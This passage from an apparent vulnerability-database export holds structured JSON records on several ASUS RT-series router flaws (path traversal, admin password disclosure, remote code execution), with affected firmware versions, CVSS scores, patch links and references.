"https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "https://www.asus.com/us/" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-006951" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-22", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-006951" }, { "db": "NVD", "id": "CVE-2013-4656" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.4, "url": "https://www.ise.io/casestudies/exploiting-soho-routers/" }, { "trust": 1.6, "url": "https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf" }, { "trust": 1.6, "url": "https://www.ise.io/soho_service_hacks/" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4656" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4656" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-006951" }, { "db": "CNNVD", "id": "CNNVD-201911-727" }, { "db": "NVD", "id": "CVE-2013-4656" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "JVNDB", "id": "JVNDB-2013-006951" }, { "db": "CNNVD", "id": "CNNVD-201911-727" }, { "db": "NVD", "id": "CVE-2013-4656" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-11-29T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-006951" }, { "date": "2019-11-13T00:00:00", "db": "CNNVD", "id": "CNNVD-201911-727" }, { "date": "2019-11-13T15:15:09.963000", "db": "NVD", "id": "CVE-2013-4656" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-11-29T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-006951" }, { "date": "2019-12-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201911-727" }, { "date": "2024-11-21T01:56:00.100000", "db": "NVD", "id": "CVE-2013-4656" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201911-727" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ASUS RT-AC66U and RT-N56U Path traversal vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-006951" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "path traversal", "sources": [ { "db": "CNNVD", "id": "CNNVD-201911-727" } ], "trust": 0.6 } }
var-201404-0636
Vulnerability from variot
Advanced_System_Content.asp in the ASUS RT series routers with firmware before 3.0.0.4.374.5517, when an administrator session is active, allows remote authenticated users to obtain the administrator user name and password by reading the source code. ASUS RT-Series Wireless Routers is a wireless router device. ASUS RT-Series Wireless Routers 'Advanced_System_Content.asp' has an information disclosure vulnerability that allows an attacker to exploit a vulnerability to obtain sensitive information. ASUS RT-Series running firmware versions prior to 3.0.0.4.374.5517 are vulnerable
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201404-0636", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "rt-n56u", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.318" }, { "model": "rt-n16", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.220" }, { "model": "rt-ac68u", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.374_4887" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "1.0.1.8n" }, { "model": "rt-ac68u", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.374.4755" }, { "model": "rt-n66u", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.370" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "1.0.1.8j" }, { "model": "rt-ac66u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.246" }, { "model": "rt-n65u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.3.176" }, { "model": "rt-n16", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "1.0.1.9" }, { "model": "rt-n65u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.334" }, { "model": "rt-ac66u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.260" }, { "model": "rt-n16", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "7.0.2.38b" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "8.1.1.4" }, { "model": "rt-n65u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.342" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.360" }, { "model": "rt-n10e", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "2.0.0.20" }, { "model": "rt-ac68u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": null }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "7.0.1.32" }, { "model": "rt-n10e", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "2.0.0.16" }, { "model": "rt-n10e", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "2.0.0.25" }, { "model": "rt-n16", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.3.162" }, { "model": "rt-n10e", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "2.0.0.24" }, { "model": "rt-n14u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.356" }, { "model": "rt-n10e", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "2.0.0.10" }, { "model": "rt-n65u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.3.134" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "1.0.1.4" }, { "model": "rt-ac66u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.354" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "1.0.1.8l" }, { "model": "rt-n16", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.246" }, { "model": "rt-n65u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.346" }, { "model": "rt-n16", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.260" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "1.0.1.4o" }, { "model": "rt-n16", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "1.0.2.3" }, { "model": "rt-n65u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.260" }, { "model": "rt-ac66u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.140" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "1.0.1.7c" }, { "model": "rt-n16", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.3.178" }, { "model": "rt-ac66u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.220" }, { "model": "rt-ac68u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.374_4561" }, { "model": "rt-n14u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.322" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "7.0.1.21" }, { "model": "tm-ac1900", "scope": "eq", "trust": 1.0, "vendor": "t mobile", "version": "3.0.0.4.376_3169" }, { "model": "rt-ac66u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.270" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.334" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.342" }, { "model": "rt-n66u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.272" }, { "model": "rt-n10e", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "2.0.0.19" }, { "model": "rt-n16", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.3.108" }, { "model": "rt-n16", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.354" }, { "model": "rt-n10e", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "2.0.0.7" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "1.0.1.7f" }, { "model": "rt-ac66u", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.374.5517" }, { "model": "rt-ac68u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-ac68u", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.374.5517" }, { "model": "rt-n10e", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.374.5517" }, { "model": "rt-n14u", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.374.5517" }, { "model": "rt-n16", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.374.5517" }, { "model": "rt-n56u", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.374.5517" }, { "model": "rt-n65u", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.374.5517" }, { "model": "rt-n66u", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.374.5517" }, { "model": "rt-series wireless routers", "scope": "lte", "trust": 0.6, "vendor": "asus", "version": "\u003c=3.0.0.4.374.5517" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-02538" }, { "db": "JVNDB", "id": "JVNDB-2014-002210" }, { "db": "CNNVD", "id": "CNNVD-201404-434" }, { "db": "NVD", "id": "CVE-2014-2719" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/h:asus:rt-ac68u", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-ac68u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-n10e_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-n14u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-n16_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-n56u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-n65u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-n66u_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-002210" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "David Longenecker", "sources": [ { "db": "BID", "id": "66954" } ], "trust": 0.3 }, "cve": "CVE-2014-2719", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 6.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 6.8, "id": "CVE-2014-2719", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:S/C:C/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-02538", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 6.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 6.8, "id": "VHN-70658", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:S/C:C/I:N/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-2719", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2014-2719", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2014-02538", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201404-434", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-70658", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-02538" }, { "db": "VULHUB", "id": "VHN-70658" }, { "db": "JVNDB", "id": "JVNDB-2014-002210" }, { "db": "CNNVD", "id": "CNNVD-201404-434" }, { "db": "NVD", "id": "CVE-2014-2719" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advanced_System_Content.asp in the ASUS RT series routers with firmware before 3.0.0.4.374.5517, when an administrator session is active, allows remote authenticated users to obtain the administrator user name and password by reading the source code. ASUS RT-Series Wireless Routers is a wireless router device. ASUS RT-Series Wireless Routers \u0027Advanced_System_Content.asp\u0027 has an information disclosure vulnerability that allows an attacker to exploit a vulnerability to obtain sensitive information. \nASUS RT-Series running firmware versions prior to 3.0.0.4.374.5517 are vulnerable", "sources": [ { "db": "NVD", "id": "CVE-2014-2719" }, { "db": "JVNDB", "id": "JVNDB-2014-002210" }, { "db": "CNVD", "id": "CNVD-2014-02538" }, { "db": "BID", "id": "66954" }, { "db": "VULHUB", "id": "VHN-70658" } ], "trust": 2.52 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-70658", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-70658" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-2719", "trust": 3.1 }, { "db": "BID", "id": "66954", "trust": 0.9 }, { "db": "JVNDB", "id": "JVNDB-2014-002210", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201404-434", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2014-02538", "trust": 0.6 }, { "db": "FULLDISC", "id": "20140416 ASUS RT-XXXX SOHO ROUTERS EXPOSE ADMIN PASSWORD, FIXED IN 3.0.0.4.374.5517", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "126213", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-70658", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-02538" }, { "db": "VULHUB", "id": "VHN-70658" }, { "db": "BID", "id": "66954" }, { "db": "JVNDB", "id": "JVNDB-2014-002210" }, { "db": "CNNVD", "id": "CNNVD-201404-434" }, { "db": "NVD", "id": "CVE-2014-2719" } ] }, "id": "VAR-201404-0636", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2014-02538" }, { "db": "VULHUB", "id": "VHN-70658" } ], "trust": 1.3092795819999998 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-02538" } ] }, "last_update_date": "2024-11-23T22:27:20.259000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "RT-N66U", "trust": 0.8, "url": "http://support.asus.com/download.aspx?m=RT-N66U+%28VER.B1%29" }, { "title": "Cellspot router firmware update information", "trust": 0.8, "url": "https://support.t-mobile.com/docs/DOC-21994" }, { "title": "ASUS RT-Series Wireless Routers \u0027Advanced_System_Content.asp\u0027 Patch for Information Disclosure Vulnerabilities", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/45075" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-02538" }, { "db": "JVNDB", "id": "JVNDB-2014-002210" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-200", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-70658" }, { "db": "JVNDB", "id": "JVNDB-2014-002210" }, { "db": "NVD", "id": "CVE-2014-2719" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://seclists.org/fulldisclosure/2014/apr/225" }, { "trust": 1.7, "url": "http://support.asus.com/download.aspx?m=rt-n66u+%28ver.b1%29" }, { "trust": 1.7, "url": "http://dnlongen.blogspot.com/2014/04/cve-2014-2719-asus-rt-password-disclosure.html" }, { "trust": 1.1, "url": "https://support.t-mobile.com/docs/doc-21994" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2719" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2719" }, { "trust": 0.8, "url": "http://dnlongen.blogspot.jp/2014/04/cve-2014-2719-asus-rt-password-disclosure.html" }, { "trust": 0.3, "url": "http://www.asus.com/" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-02538" }, { "db": "VULHUB", "id": "VHN-70658" }, { "db": "BID", "id": "66954" }, { "db": "JVNDB", "id": "JVNDB-2014-002210" }, { "db": "CNNVD", "id": "CNNVD-201404-434" }, { "db": "NVD", "id": "CVE-2014-2719" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2014-02538" }, { "db": "VULHUB", "id": "VHN-70658" }, { "db": "BID", "id": "66954" }, { "db": "JVNDB", "id": "JVNDB-2014-002210" }, { "db": "CNNVD", "id": "CNNVD-201404-434" }, { "db": "NVD", "id": "CVE-2014-2719" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-04-21T00:00:00", "db": "CNVD", "id": "CNVD-2014-02538" }, { "date": "2014-04-22T00:00:00", "db": "VULHUB", "id": "VHN-70658" }, { "date": "2014-04-14T00:00:00", "db": "BID", "id": "66954" }, { "date": "2014-04-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-002210" }, { "date": "2014-04-23T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-434" }, { "date": "2014-04-22T13:06:29.493000", "db": "NVD", "id": "CVE-2014-2719" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-04-21T00:00:00", "db": "CNVD", "id": "CNVD-2014-02538" }, { "date": "2016-06-30T00:00:00", "db": "VULHUB", "id": "VHN-70658" }, { "date": "2014-04-14T00:00:00", "db": "BID", "id": "66954" }, { "date": "2016-02-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-002210" }, { "date": "2014-04-23T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-434" }, { "date": "2024-11-21T02:06:49.840000", "db": "NVD", "id": "CVE-2014-2719" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-434" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ASUS RT-Series Wireless Routers \u0027Advanced_System_Content.asp\u0027 Information Disclosure Vulnerability", "sources": [ { "db": "CNVD", "id": "CNVD-2014-02538" }, { "db": "BID", "id": "66954" } ], "trust": 0.9 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "information disclosure", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-434" } ], "trust": 0.6 } }
var-201804-1564
Vulnerability from variot
ASUS RT-AC51U, RT-AC58U, RT-AC66U, RT-AC1750, RT-ACRH13, and RT-N12 D1 routers with firmware before 3.0.0.4.380.8228; RT-AC52U B1, RT-AC1200 and RT-N600 routers with firmware before 3.0.0.4.380.10446; RT-AC55U and RT-AC55UHP routers with firmware before 3.0.0.4.382.50276; RT-AC86U and RT-AC2900 routers with firmware before 3.0.0.4.384.20648; and possibly other RT-series routers allow remote attackers to execute arbitrary code via unspecified vectors. plural ASUS Router product firmware contains a vulnerability related to input validation.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUSRT-AC51U and others are router products of ASUS. There are security vulnerabilities in several ASUS products. A remote attacker can exploit this vulnerability to execute arbitrary code. The following products are affected: ASUS RT-AC51U, RT-AC58U, RT-AC66U, RT-AC1750, RT-ACRH13, RT-N12 D1 (using firmware earlier than 3.0.0.4.380.8228); RT-AC52U B1, RT-AC1200 , RT-N600 (use the previous version 3.0.0.4.380.10446 firmware); RT-AC55U, RT-AC55UHP (use the previous version 3.0.0.4.382.50276 firmware); RT-AC86U, RT-AC2900 (use the previous version 3.0. version 0.4.384.20648 firmware)
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201804-1564", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "rt-ac1200", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.380.10446" }, { "model": "rt-ac55u", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.382.50276" }, { "model": "rt-ac1750", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.380.8228" }, { "model": "rt-n12 d1", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.380.8228" }, { "model": "rt-n600", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.380.10446" }, { "model": "rt-ac86u", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.384.20648" }, { "model": "rt-ac2900", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.384.20648" }, { "model": "rt-ac52u b1", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.380.10446" }, { "model": "rt-ac55uhp", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.382.50276" }, { "model": "rt-acrh13", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.380.8228" }, { "model": "rt-ac66u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.380.8228" }, { "model": "rt-ac51u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.380.8228" }, { "model": "rt-ac58u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.380.8228" }, { "model": "rt-ac1200", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.380.10446" }, { "model": "rt-ac1750", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.380.8228" }, { "model": "rt-ac2900", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.384.20648" }, { "model": "rt-ac51u", "scope": "lt", "trust": 0.8, "vendor": "asustek 